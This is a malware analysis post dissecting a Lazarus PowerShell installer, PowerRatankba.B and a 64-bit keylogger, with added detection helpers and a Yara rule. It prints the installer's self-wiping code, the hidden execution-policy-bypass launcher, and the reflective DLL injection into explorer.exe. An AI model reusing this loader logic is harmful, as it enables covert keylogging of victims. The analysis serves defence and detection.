Let’s Learn: Dissecting Lazarus PowerShell PowerRatankba.B, Installer Script & Keylogger: Pakistan Version

Goal: Document and review the latest Lazarus PowerRatankba.B, PowerShell installer script leading to the 64-bit keylogger version (Pakistan version).

Source:
Lazarus PowerShell PowerRatankba.B "REG_LOCALDATA.ps1" (Pakistan)
MD5: c9ed87e9f99c631cda368f6f329ee27e
Lazarus PowerShell installer script "hm.ps1" (Pakistan)
MD5: 5cc28f3f32e7274f13378a724a5ec33a
Keylogger 64-bit (x64) "capture_x64.dll" (Pakistan)
MD5: 2025D91C1CDD33DB576B2C90EF4067C7

Outline:

I. Background & Executive Summary
II. PowerShell PowerRatankba.B "REG_LOCALDATA.ps1" (Pakistan)
III. Lazarus PowerShell Installer Script "hm.ps1" (Pakistan)
A. Main Code Flow
B. "DoProcess" Function
C. "shell_script"
IV. Lazarus Keylogger 64-bit (x64) "capture_x64.dll" (Pakistan)
V. Yara Signature
Analysis
I. Background & Executive Summary
This analysis is a continuation of the reporting on the recent Lazarus toolkits. It is notable that the latest discovered PowerRatankba.B toolkit, uploaded from Pakistan, is almost identical to the one from the Chilean Redbanc incident, with a slightly different hardcoded URI structure ending in “cgetpsa” and “cgetruna” on the same server, while the recently uploaded Lazarus PowerShell installer (and its keylogger) bears similarity to the ones shared by the Vietnamese CERT. It is possible that the Lazarus group was targeting financial institutions in both Chile and Pakistan while deploying the same command-and-control server, and before that in Vietnam.
Before diving deeper into the Lazarus PowerShell installation and keylogger analysis, I highly recommend reading the Norfolk Infosec blog titled “A Lazarus Keylogger - PSLogger”, which details an older version of the similar script, its installation, and the keylogger DLL component. As noted there, the script and its installation do not contain a command-and-control protocol, which likely means that the group exfiltrates the screenshots and keylogger data at a later point via other means.
I have also uploaded MISP JSON and CSV files associated with the Lazarus tools (Pakistan) to GitHub (k-vitali/apt_lazarus_toolkits) for detection and mitigation of this threat.
II. PowerShell PowerRatankba.B “REG_LOCALDATA.ps1” (Pakistan)
The latest identified PowerRatankba.B, uploaded from Pakistan, is a reconnaissance Lazarus tool with almost identical script and logic to the Chilean Redbanc incident (using the same server), with the exception of the URI structure and the lack of the commented-out additional server.

III. Lazarus PowerShell Installer Script “hm.ps1” (Pakistan)

A. Main Code Flow
The main function setup obtains the process list via the native PowerShell command “Get-Process | Select-Object id,name”, which returns the current process IDs with their process names, then converts each process name to lower case and sets the boolean “$bIsInjected = $false”. If the process name matches ‘explorer’, the malware enters the “DoProcess” function, passing the process ID as -Target_PID, and then exits.
The main script setup is as follows:

////////////////////////////////////////////////////
////// Lazarus PowerShell installer main flow //////
////////////////////////////////////////////////////
# Overwrite the script's own file with zero bytes, then delete it
$OwnPath = $MyInvocation.MyCommand.Path;
$filesize = (Get-Item $OwnPath).length
$resetBuf = New-Object byte[] $filesize
[System.IO.File]::WriteAllBytes($OwnPath, $resetBuf)
Remove-Item -Path $OwnPath -Force -Recurse
...
$cnt_read = 0;
while($true)
{
    # Enumerate running processes (id, name) and look for explorer
    $process_list = Get-Process | Select-Object id,name
    foreach($iter in $process_list)
    {
        $process_name = $iter.name.ToLower();
        $bIsInjected = $false;
        if($process_name.CompareTo('explorer') -eq 0)
        {
            # Hand the explorer PID to DoProcess for injection
            $ProID = $iter.Id
            DoProcess -Target_PID $ProID
            $ProcessListArray += $ProID
        }
    }
    exit;   # single pass: the loop body never repeats
}

B. “DoProcess” Function
Essentially, the “DoProcess” function takes the string parameter $Target_PID and creates a file path with four random hexadecimal characters, “C:\windows\temp\tmp[0-9A-F]{4}.ps1”.

////////////////////////////////////////////////////
///// Lazarus PowerShell 'DoProcess' Function //////
////////////////////////////////////////////////////
Function DoProcess
{
    param([String]$Target_PID)
    # Random drop path: tmp + 4 hex chars (digits 48..57, A-F 65..70) + .ps1
    $szFileName = 'C:\windows\temp\tmp' + -join ((48..57) + (65..70) | Get-Random -Count 4 | % { [char]$_ }) + '.ps1';
    # Stub script: de-obfuscate $shell_script ('|' -> 'a', base64), substitute the
    # placeholders with the base64 DLL and the target PID, then Invoke-Command it
    [String]$szCode = '$SScript = "' + $shell_script + '"; [String]$NewStr = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($SScript.Replace("|","a")));$NewStr=$NewStr.Replace("EXECUTION_BINARY", "' + $InputString + '");$NewStr=$NewStr.Replace("PROCESSID", "' + $Target_PID + '");$NewBlock = [Scriptblock]::Create($NewStr);Invoke-Command -ScriptBlock $NewBlock;';
    $szCode | Out-File -Encoding ascii $szFileName;
    # Launch the stub hidden with the execution policy bypassed
    [String]$szArgList = '-ep bypass -file ' + $szFileName;
    $ProID = Start-Process powershell.exe -PassThru -WindowStyle Hidden -ArgumentList $szArgList;
}

The malware parses “shell_script”, replaces “|” with “a”, base64-decodes the result, and replaces the “EXECUTION_BINARY” value with the base64 version of the 64-bit (x64) keylogger DLL. Additionally, it replaces “PROCESSID” with the “$Target_PID” argument, writes the resulting script to the tmp file, and executes it via “Start-Process powershell.exe -PassThru -WindowStyle Hidden -ArgumentList '-ep bypass -file C:\windows\temp\tmp[0-9A-F]{4}.ps1'”.
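The launch command line above is a usable hunting pivot. The check below is an added example (not code from the post or from the malware) that runs it over constructed process-creation records; the field names assume a Sysmon Event ID 1 style export.

```python
"""Process-creation hunt for the hm.ps1 second stage (an added example, not
code from the post). DoProcess starts powershell.exe with
'-ep bypass -file C:\\windows\\temp\\tmpXXXX.ps1' (four random hex characters)
from the already-running PowerShell installer, so the rule keys on that exact
path shape plus a powershell.exe parent. The records are constructed; the field
names assume a Sysmon Event ID 1 style export (an assumption, not from the post)."""
import re

# Matches the argument string DoProcess builds; case-insensitive like NTFS paths.
STUB_LAUNCH = re.compile(
    r'-ep\s+bypass\s+-file\s+c:\\windows\\temp\\tmp[0-9a-f]{4}\.ps1(\s|$)', re.I)


def is_stub_launch(record: dict) -> bool:
    """True when a powershell.exe child of powershell.exe runs the tmp stub."""
    image = record.get('Image', '').lower()
    parent = record.get('ParentImage', '').lower()
    return (image.endswith('\\powershell.exe')
            and parent.endswith('\\powershell.exe')
            and STUB_LAUNCH.search(record.get('CommandLine', '')) is not None)


def hunt(records):
    """Return the ProcessIds of records that match the stub launch pattern."""
    return [r['ProcessId'] for r in records if is_stub_launch(r)]


PS = r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
# Constructed sample records: one true hit, one benign admin script, one near-miss
SAMPLE_RECORDS = [
    {'ProcessId': 4120, 'Image': PS, 'ParentImage': PS,
     'CommandLine': r'"powershell.exe" -ep bypass -file C:\windows\temp\tmp3F0A.ps1'},
    {'ProcessId': 4188, 'Image': PS, 'ParentImage': r'C:\Windows\explorer.exe',
     'CommandLine': r'"powershell.exe" -ep bypass -file C:\Users\admin\deploy.ps1'},
    {'ProcessId': 4201, 'Image': PS, 'ParentImage': PS,
     'CommandLine': r'"powershell.exe" -ep bypass -file C:\windows\temp\tmp12345.ps1'},
]

if __name__ == '__main__':
    print('suspicious ProcessIds:', hunt(SAMPLE_RECORDS))
```

The -WindowStyle Hidden flag is not visible in the child's command line, so the rule does not depend on it.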
C. “shell_script”
The code itself is PowerSploit’s “Invoke-ReflectivePEInjection”, which reflectively injects a DLL into a remote process after decoding the DLL from base64 to binary.

////////////////////////////////////////////////////
///// Lazarus PowerShell 'shell_script' Excerpt ////
////////////////////////////////////////////////////
# Placeholders that DoProcess replaces with the base64 DLL and the target PID
[String]$InputString = 'EXECUTION_BINARY';
[String]$idProcess = 'PROCESSID';
$injectionErrorCode = '';
$global:cmdRes = 0;
# PowerSploit's Invoke-ReflectivePEInjection and its helpers (bodies omitted)
function Invoke-ReflectivePEInjection
 Function Get-Win32Types
 Function Get-Win32Constants
 Function Get-Win32Functions
 Function Sub-SignedIntAsUnsigned
 Function Add-SignedIntAsUnsigned
 Function Compare-Val1GreaterThanVal2AsUInt
...
$PEBytes = [System.Convert]::FromBase64String($InputString);
if ($idProcess -eq 0)
{
    # No target PID: the PE is loaded into the current PowerShell process
    Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType Void -ForceASLR;
}
else
{
    # Inject into the remote process (the explorer PID from the main loop)
    Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType Void -ForceASLR -ProcId $idProcess;
}

The malware forces the use of address space layout randomization (ASLR) on the loaded PE even if the PE indicates it does not support ASLR (-ForceASLR). Additionally, it passes -FuncReturnType, the return type of the function being called in the DLL, and the -ProcId parameter, substituting $idProcess = ‘PROCESSID’ with the explorer PID from the main flow loop and $InputString = ‘EXECUTION_BINARY’ with the base64 of the dropped Lazarus 64-bit keylogger “capture_x64.dll”.
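To pull the substituted DLL and PID back out of a dropped tmp stub without executing it, combining the DoProcess substitution from section B with the placeholders of section C, here is an added Python example (not the post’s or the malware’s code). The stub it parses is constructed from a placeholder stage and a fake MZ-header-only payload.

```python
"""Triage helper for the tmpXXXX.ps1 stub DoProcess drops (an added example,
not code from the post). It reverses the '|' -> 'a' swap on the base64
$SScript blob, applies the EXECUTION_BINARY / PROCESSID replacements the stub
carries, and extracts the embedded PE without executing anything. The stub
below is constructed from a placeholder stage and an MZ-header-only fake DLL."""
import base64
import hashlib
import re


def deobfuscate_shell_script(blob: str) -> str:
    """Undo the installer's Replace("|","a") trick and base64-decode the stage."""
    if 'a' in blob:
        raise ValueError("blob contains 'a': not the '|'-substituted form")
    return base64.b64decode(blob.replace('|', 'a'), validate=True).decode('ascii')


def recover_payload(stub: str) -> dict:
    """Rebuild the decoded stage and pull out the injected PE and target PID."""
    m = re.search(r'\$SScript = "([^"]+)"', stub)
    if not m:
        raise ValueError('no $SScript blob found')
    stage, subs = deobfuscate_shell_script(m.group(1)), {}
    for key in ('EXECUTION_BINARY', 'PROCESSID'):
        hit = re.search(r'Replace\("%s",\s*"([^"]*)"\)' % key, stub)
        if hit:                        # the stub substitutes both before Invoke-Command
            subs[key] = hit.group(1)
            stage = stage.replace(key, hit.group(1))
    pe = base64.b64decode(subs.get('EXECUTION_BINARY', ''))
    pid = subs.get('PROCESSID', '')
    return {'pid': int(pid) if pid.isdigit() else None,
            'is_pe': pe[:2] == b'MZ',  # uint16(0) == 0x5a4d, as in the Yara rule
            'sha256': hashlib.sha256(pe).hexdigest(),
            'stage': stage}


# Constructed sample: placeholder stage obfuscated exactly as hm.ps1 stores it
STAGE_PLAIN = "[String]$InputString = 'EXECUTION_BINARY';[String]$idProcess = 'PROCESSID';"
STAGE_BLOB = base64.b64encode(STAGE_PLAIN.encode()).decode().replace('a', '|')
FAKE_DLL_B64 = base64.b64encode(b'MZ' + b'\x00' * 62).decode()  # header only
SAMPLE_STUB = ('$SScript = "%s"; $NewStr=$NewStr.Replace("EXECUTION_BINARY", "%s");'
               '$NewStr=$NewStr.Replace("PROCESSID", "4242");' % (STAGE_BLOB, FAKE_DLL_B64))

if __name__ == '__main__':
    r = recover_payload(SAMPLE_STUB)
    print('pid:', r['pid'], 'PE:', r['is_pe'], 'sha256:', r['sha256'])
```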
IV. Lazarus Keylogger 64-bit (x64) “capture_x64.dll”
The keylogger is a 64-bit DLL with the compilation timestamp Monday, September 24 09:44:33 2018 UTC. It contains the same screenshot library, the export function “Process”, and the same XZip library as the reported Vietnamese and Pakistani keyloggers, with the same setup as reported in detail by Norfolk Infosec.

V. Yara Signature: Keylogger

rule apt_lazarus_keylogger
{
    meta:
        description = "Detects possible Lazarus Keylogger"
        author = "@VK_Intel"
        date = "2019-01-25"
    strings:
        $s0 = "%s%s" fullword ascii wide
        $s1 = "[ENTER]" fullword ascii wide
        $s2 = "[EX]" fullword ascii wide
        $s3 = "%02d:%02d" fullword ascii wide
        $dll0 = "PSLogger.dll" fullword ascii wide
        $dll1 = "capture_x64.dll" fullword ascii wide
        $exe = "PSLogger.exe" fullword ascii wide
    condition:
        uint16(0) == 0x5a4d and all of ($s*) and (1 of ($dll*) or $exe)
}
